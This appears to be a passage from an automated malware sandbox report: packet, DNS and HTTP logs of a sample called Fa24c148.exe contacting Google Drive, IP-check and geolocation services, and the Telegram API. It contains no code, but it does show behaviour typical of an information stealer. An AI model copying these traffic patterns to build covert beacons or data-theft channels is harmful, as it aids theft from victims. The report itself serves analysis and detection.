                                                                                                  Oct 28, 2024 12:22:39.210680962 CET8049743132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:40.089992046 CET8049743132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:40.092161894 CET49744443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:40.092209101 CET44349744188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:40.092305899 CET49744443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:40.092685938 CET49744443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:40.092717886 CET44349744188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:40.137752056 CET4974380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:40.923178911 CET44349744188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:40.933067083 CET49744443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:40.933120012 CET44349744188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:41.070353985 CET44349744188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:41.070415974 CET44349744188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:41.070566893 CET49744443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:41.070959091 CET49744443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:41.074991941 CET4974380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:41.076071024 CET4974580192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:41.081023932 CET8049743132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:41.081106901 CET4974380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:41.081470013 CET8049745132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:41.081562996 CET4974580192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:41.081641912 CET4974580192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:41.086981058 CET8049745132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:41.946176052 CET8049745132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:41.947999954 CET49746443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:41.948091030 CET44349746188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:41.948195934 CET49746443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:41.948553085 CET49746443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:41.948590994 CET44349746188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:41.997100115 CET4974580192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:42.566046000 CET44349746188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:42.568250895 CET49746443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:42.568325043 CET44349746188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:42.712872028 CET44349746188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:42.712917089 CET44349746188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:42.712996006 CET49746443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:42.713599920 CET49746443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:42.718739986 CET4974580192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:42.719923973 CET4974780192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:42.724594116 CET8049745132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:42.724689960 CET4974580192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:42.725347042 CET8049747132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:42.725553036 CET4974780192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:42.725653887 CET4974780192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:42.730976105 CET8049747132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:43.631901026 CET8049747132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:43.633533001 CET49749443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:43.633584023 CET44349749188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:43.633663893 CET49749443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:43.633965015 CET49749443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:43.633985043 CET44349749188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:43.684642076 CET4974780192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:44.233767033 CET44349749188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:44.235999107 CET49749443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:44.236049891 CET44349749188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:44.374931097 CET44349749188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:44.375011921 CET44349749188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:44.375082970 CET49749443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:44.375632048 CET49749443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:44.393870115 CET4974780192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:44.397188902 CET4975080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:44.400731087 CET8049747132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:44.400927067 CET4974780192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:44.402673006 CET8049750132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:44.402965069 CET4975080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:44.403075933 CET4975080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:44.408482075 CET8049750132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:45.273511887 CET8049750132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:45.275587082 CET49751443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:45.275629997 CET44349751188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:45.275727987 CET49751443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:45.276041031 CET49751443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:45.276060104 CET44349751188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:45.325373888 CET4975080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:45.961602926 CET44349751188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:45.963660955 CET49751443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:45.963689089 CET44349751188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:46.105449915 CET44349751188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:46.105508089 CET44349751188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:46.105580091 CET49751443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:46.106178999 CET49751443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:46.110472918 CET4975080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:46.111834049 CET4975380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:46.116707087 CET8049750132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:46.116770983 CET4975080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:46.117172003 CET8049753132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:46.117294073 CET4975380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:46.117404938 CET4975380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:46.122723103 CET8049753132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.209151983 CET8049753132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.210674047 CET49754443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:47.210707903 CET44349754188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.210783005 CET49754443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:47.211055040 CET49754443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:47.211066961 CET44349754188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.252171040 CET8049753132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.254367113 CET4975380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:47.817466021 CET44349754188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.819082022 CET49754443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:47.819114923 CET44349754188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.959702015 CET44349754188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.959774971 CET44349754188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.959956884 CET49754443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:47.960335970 CET49754443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:47.964381933 CET4975380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:47.965512991 CET4976080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:47.970365047 CET8049753132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.970438004 CET4975380192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:47.970976114 CET8049760132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:47.971112967 CET4976080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:47.971232891 CET4976080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:47.976625919 CET8049760132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:48.838175058 CET8049760132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:48.841941118 CET49766443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:48.842036963 CET44349766188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:48.842180014 CET49766443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:48.842447996 CET49766443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:48.842477083 CET44349766188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:48.887737989 CET4976080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:49.470417976 CET44349766188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:49.528364897 CET49766443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:49.545447111 CET49766443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:49.545475960 CET44349766188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:49.694634914 CET44349766188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:49.694924116 CET44349766188.114.97.3192.168.2.4
                                                                                                  Oct 28, 2024 12:22:49.695468903 CET49766443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:49.695751905 CET49766443192.168.2.4188.114.97.3
                                                                                                  Oct 28, 2024 12:22:49.726192951 CET4976080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:49.731884003 CET8049760132.226.247.73192.168.2.4
                                                                                                  Oct 28, 2024 12:22:49.732058048 CET4976080192.168.2.4132.226.247.73
                                                                                                  Oct 28, 2024 12:22:49.734162092 CET49772443192.168.2.4149.154.167.220
                                                                                                  Oct 28, 2024 12:22:49.734198093 CET44349772149.154.167.220192.168.2.4
                                                                                                  Oct 28, 2024 12:22:49.734285116 CET49772443192.168.2.4149.154.167.220
                                                                                                  Oct 28, 2024 12:22:49.734688997 CET49772443192.168.2.4149.154.167.220
                                                                                                  Oct 28, 2024 12:22:49.734703064 CET44349772149.154.167.220192.168.2.4
                                                                                                  Oct 28, 2024 12:22:50.604964018 CET44349772149.154.167.220192.168.2.4
                                                                                                  Oct 28, 2024 12:22:50.605063915 CET49772443192.168.2.4149.154.167.220
                                                                                                  Oct 28, 2024 12:22:50.607283115 CET49772443192.168.2.4149.154.167.220
                                                                                                  Oct 28, 2024 12:22:50.607300043 CET44349772149.154.167.220192.168.2.4
                                                                                                  Oct 28, 2024 12:22:50.607709885 CET44349772149.154.167.220192.168.2.4
                                                                                                  Oct 28, 2024 12:22:50.609117985 CET49772443192.168.2.4149.154.167.220
                                                                                                  Oct 28, 2024 12:22:50.651330948 CET44349772149.154.167.220192.168.2.4
                                                                                                  Oct 28, 2024 12:22:50.848736048 CET44349772149.154.167.220192.168.2.4
                                                                                                  Oct 28, 2024 12:22:50.848884106 CET44349772149.154.167.220192.168.2.4
                                                                                                  Oct 28, 2024 12:22:50.849001884 CET49772443192.168.2.4149.154.167.220
                                                                                                  Oct 28, 2024 12:22:50.854007006 CET49772443192.168.2.4149.154.167.220
                                                                                                  Oct 28, 2024 12:22:56.734488964 CET4974180192.168.2.4132.226.247.73
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 28, 2024 12:22:27.338768005 CET6300353192.168.2.41.1.1.1
                                                                                                  Oct 28, 2024 12:22:27.346687078 CET53630031.1.1.1192.168.2.4
                                                                                                  Oct 28, 2024 12:22:28.743974924 CET5039453192.168.2.41.1.1.1
                                                                                                  Oct 28, 2024 12:22:28.751856089 CET53503941.1.1.1192.168.2.4
                                                                                                  Oct 28, 2024 12:22:33.792751074 CET5832753192.168.2.41.1.1.1
                                                                                                  Oct 28, 2024 12:22:33.800307035 CET53583271.1.1.1192.168.2.4
                                                                                                  Oct 28, 2024 12:22:35.370729923 CET5767453192.168.2.41.1.1.1
                                                                                                  Oct 28, 2024 12:22:35.379466057 CET53576741.1.1.1192.168.2.4
                                                                                                  Oct 28, 2024 12:22:49.726098061 CET5759553192.168.2.41.1.1.1
                                                                                                  Oct 28, 2024 12:22:49.733338118 CET53575951.1.1.1192.168.2.4
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Oct 28, 2024 12:22:27.338768005 CET192.168.2.41.1.1.10x2e92Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:28.743974924 CET192.168.2.41.1.1.10xa62Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:33.792751074 CET192.168.2.41.1.1.10x3e4fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:35.370729923 CET192.168.2.41.1.1.10x9e4dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:49.726098061 CET192.168.2.41.1.1.10x6e44Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Oct 28, 2024 12:22:27.346687078 CET1.1.1.1192.168.2.40x2e92No error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:28.751856089 CET1.1.1.1192.168.2.40xa62No error (0)drive.usercontent.google.com142.250.186.65A (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:33.800307035 CET1.1.1.1192.168.2.40x3e4fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:33.800307035 CET1.1.1.1192.168.2.40x3e4fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:33.800307035 CET1.1.1.1192.168.2.40x3e4fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:33.800307035 CET1.1.1.1192.168.2.40x3e4fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:33.800307035 CET1.1.1.1192.168.2.40x3e4fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:33.800307035 CET1.1.1.1192.168.2.40x3e4fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:35.379466057 CET1.1.1.1192.168.2.40x9e4dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:35.379466057 CET1.1.1.1192.168.2.40x9e4dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                  Oct 28, 2024 12:22:49.733338118 CET1.1.1.1192.168.2.40x6e44No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                  • drive.google.com
                                                                                                  • drive.usercontent.google.com
                                                                                                  • reallyfreegeoip.org
                                                                                                  • api.telegram.org
                                                                                                  • checkip.dyndns.org
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449738132.226.247.73801440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 28, 2024 12:22:33.811286926 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 28, 2024 12:22:34.677573919 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:34 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 4b80f40d3b3494b467f7f46cb520baa7
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                                                                                                  Oct 28, 2024 12:22:34.683379889 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Oct 28, 2024 12:22:34.945449114 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:34 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: ad0c8ff668781f41a74f11e47eb088a1
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                                                                                                  Oct 28, 2024 12:22:36.506874084 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Oct 28, 2024 12:22:36.769855022 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:36 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: f5a88d71f6476a61d86c6b1739e964df
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.449741132.226.247.73801440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 28, 2024 12:22:37.546799898 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Oct 28, 2024 12:22:38.419373989 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:38 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 9daf87bce38525829446596bf1d55e42
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.449743132.226.247.73801440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 28, 2024 12:22:39.205363989 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 28, 2024 12:22:40.089992046 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:39 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: e1eeae3d03b9da753a53bf485221f68d
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.449745132.226.247.73801440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 28, 2024 12:22:41.081641912 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 28, 2024 12:22:41.946176052 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:41 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 951d8fa83027a50204bbea0498e951e8
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.449747132.226.247.73801440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 28, 2024 12:22:42.725653887 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 28, 2024 12:22:43.631901026 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:43 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: d3d46bf8c27f42aa5b5b632b950c3d62
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.449750132.226.247.73801440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 28, 2024 12:22:44.403075933 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 28, 2024 12:22:45.273511887 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:45 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 1363f4346c9714c61485f3c7634981db
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.449753132.226.247.73801440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
